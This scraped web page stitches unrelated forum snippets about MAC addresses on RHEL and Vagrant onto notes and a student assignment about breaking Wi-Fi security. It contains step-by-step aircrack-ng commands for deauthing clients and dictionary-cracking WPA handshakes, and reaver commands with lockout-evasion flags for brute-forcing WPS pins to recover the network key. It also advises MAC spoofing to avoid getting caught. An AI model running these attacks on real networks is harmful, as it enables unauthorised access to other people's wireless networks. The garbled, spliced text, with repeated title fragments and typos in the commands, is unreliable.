Failed To Retrieve A Mac Address For Interface Mon0
Disclaimer : This info is shared for education purpose only. I dont take any responsibility if any person/org uses it intentionally harm any one.
- Failed To Retrieve A Mac Address For Interface 'mon0' Reaver
- Failed To Retrieve A Mac Address For Interface 'mon0'
Sadly, I can't remember what the command is the find the previous entry, but. Hope this helps, and if you need to find the previous entry, I hope this inspires you enough to google and figure it out! Edit: THANKS ALL! There is some GREAT info in the comments; I really appreciate everyone's contribution, and I'm learning even more. The Network Interface MAC address is changing after each reboot. How to assign a permanent MAC address to the bonding interface in RHEL? Force the bond interface to take a MAC address of the slave. Resolution Assigning permanent MAC address for an Ethernet interface. Please keep in mind that ethX style naming will not work on Rhel 7. We should have eth2 match the same behavior of eth1 by receiving its static IP from the Vagrantfile. This would likely work if the MAC address was correctly formatted i.e. Not concatenated with eth1's MAC address. Actual behaviour. The eth2 interface receives a DHCP IP address instead of a static one. See above for more details.
This less like a tutorial but more like my personal notes while studying the security.
Things you need : KALI Linux, Aircrank-ng suite (NO EXCEPTIONS)
1. Down the interface so its not connect to any network
ifconfig wlan0 down
2. Start wlan0 on monitor mode, result would be mon0, mon1… mon#
airmon-ng start wlan0
3. Change the mac on monitor interface (not needed but pen testing can’t be done without clearing out your own footprints)
ifconfig mon0 down
macchanger -r mon0 //this would give random mac address to monitor interface
ifconfig mon0 up
4. Check if you got new mac address
ifconfig man0
5. Dumping from specific channel
airodump-ng mon0 -c 11
6. Starting the packing dump and writing
airodump-ng -w H6762 –bssid BC:CA:B5:39:67:60 -c 11 –ivs mon0
-w fileName That would use to make .ivs files
–bssid AP’s Mac access
-c Channel Number
–ivs = only dump IV Intial Vector so dump file size is small
mon0 – your interface which is monitoring
7. Check packet injection
aireplay-ng -9 -e HOME-6762 -a BC:CA:B5:39:67:60 mon0
8. Deauthing the client so it would conenct again and we woudld get handshake between client and AP
aireplay-ng –deauth 5 -a BC:00:B5:00:67:60 -c 84:00:A5:30:F0:00 mon0
–deauth #number of packets
-a Access point AKA Router
-c Client or Station
9. Starting the dictionary attack to crack the handshake that we got from previous step
aircrack-ng H6562-02.ivs -w /usr/share/wordlists/rockyou.txt
yup if password is in the text file. it would be crack 100% of time. There are bigger file that goes up to 15 gig uncompressed.
Please keep in mind brute force can take a lot of time. So In my opinion, its not practical approach for home users to crack some password with their home computer. No Offense.
Cracking WPS security Reaver way
wash -i mon0
ver -i mon0 –channel 1 –essid SOME-2452 –bssid F8:EE:A5:WW:FF:50 -vv
Little bit description about WPS, Why its so much easier when comes to brute force
An 8 digit pin using 0-9 = 10 to the 8th possible combinations (100,000,000).
However since the 8th digit isn’t part of the pin it is just a check sum of the other 7, total = 10 to the 7th (10,000,000).
However WPS presents the pin in two halves for verification. So if one half of 4 digits are correct it will just work on the other half of 4.
Don’t forget the second half has one space for a check sum, so really it’s just 3 digits in the second half.
The correct total for WPS (10 to the 4th + 10 to the 3rd = 11,000). So the first half has 10,000 possible combinations and the second half has just 1,000.
Short keys (–dh-small,-S) will speed it up. My lab gives me 22-90 secs a pin on updated firmware routers. 2-3 seconds on old firmware.
Also things to note is that even tho the router says locked or no WPS hit it anyway(-L) to vet that because my recent tests show they are unlocked yet flagging locked.
What I used last..
“reaver -i monx -a -S -N -E -b xx:xx:xx:xx:xx:xx -vv -d 3 # -r 2:199 # if you are getting locked out too much add that it may help”
-a Auto select some advanced features.
Failed To Retrieve A Mac Address For Interface 'mon0' Reaver
-S Use small diffleman attacks (reduces strain on the router & increases speed).
-N No nacks, just speeds things up a bit.
-E Terminates each pin attempt with an EAPOL fail so it may trick the router into thinking the pin failed and may let you try more before it locks.
-d The default delay period between pin attempts is 1 second.
-r Recurring delay. Sleep for y number of seconds every x pin attempts.
Disclaimer: This is for educational and personal use only. This was originally done as an assignment for SEC701 – Ethical Hacking. I do not condone potential illegal uses of this information. However it is perfectly legal to “hack” your own equipment or equipment you’re authorized to administer. If you use this for malicious purposes, it is not my fault.
Background
WPS is a security standard that allows users to connect to WPA/WPA2 networks easier, through use of an 8 digit pin code. As a result this actually weakens the security of WPA/WPA2 as this can be brute forced, and once compromised allows the hacker the ability to access the router/access point and have it provide it’s own passphrase or PSK (pre-shared key). The tools used in this attack are as follows, all included in Kali linux.
Failed To Retrieve A Mac Address For Interface 'mon0'
- macchanger (for MAC spoofing, not directly connected to the attack)
- airmon-ng
- wash
- reaver
The video used as a basis for this attack (and shown for demonstration in class) can be found here:
Part 1 – MAC Spoofing
While not essential to our hack, in order to simulate doing this for real we’re going to spoof our MAC Address to limit the potential for getting caught. To do this requires only a few steps. For demonstration purposes, show the current MAC address:
The first thing we do is bring the interface down and stop network manager, by issuing the following commands:
Now we generate a random MAC address using macchanger. There are a couple of different options here, either using -r which will generate a random MAC or -a which will generate a random MAC with the same manufacturer prefix (if it can determine the manufacturer). In my case, it couldn’t so the output is the same as using -r.
Finally bring the interface up, and note the MAC has changed (the previous step actually shows you the original MAC and the new MAC).
Part 2 – Hacking WPS
Hacking WPS was actually less work than hacking WEP, though it took a lot longer. The first thing we need to do is run airmon-ng without options to ensure our wireless interface is being detected properly.
Next issue the command again with the interface included to start monitoring.
Issue the wash command to scan for access points in the area.
The output should look something like the following.
Now we’re going to run reaver with the MAC address of the access point as an argument, which was obtained as a result of the command used in the previous step. This step can take anywhere from 4 to 20+ hours. In my case it took about 6 hours to successfully crack the WPS pin.
Once you have the pin, run reaver again providing it the pin as an argument and it will return the PSK fairly quickly.
Which resulted in the following output.
Conclusions
The attack method used to compromise WPA/WPA2 by way of hacking the WPS was in my opinion much easier than that used to hack WEP in a previous demonstration this semester. While WEP took about 30 minutes to crack, hacking WPS took approximately 6 hours. After some very brief research online I discovered that this process can take anywhere from 4 to 30 hours. You would think the length of time required to perform the hack would be somewhat of a deterrent, however once WPS has been compromised it opens up a permanent vulnerability (unless one disables WPS) as the same key can be used to repeat the process once the Administrator for the access point changes the pre-shared key. To further complicate matters the WPS key is hard coded for each router, and cannot be changed. Which leads us to another problem. Some access points don’t actually disable WPS even when you’ve disabled the ability in the device’s settings. This has been patched by many of the leading manufacturers, but it is up to the Administrator responsible for the access point to see if this is in fact an issue for their particular hardware.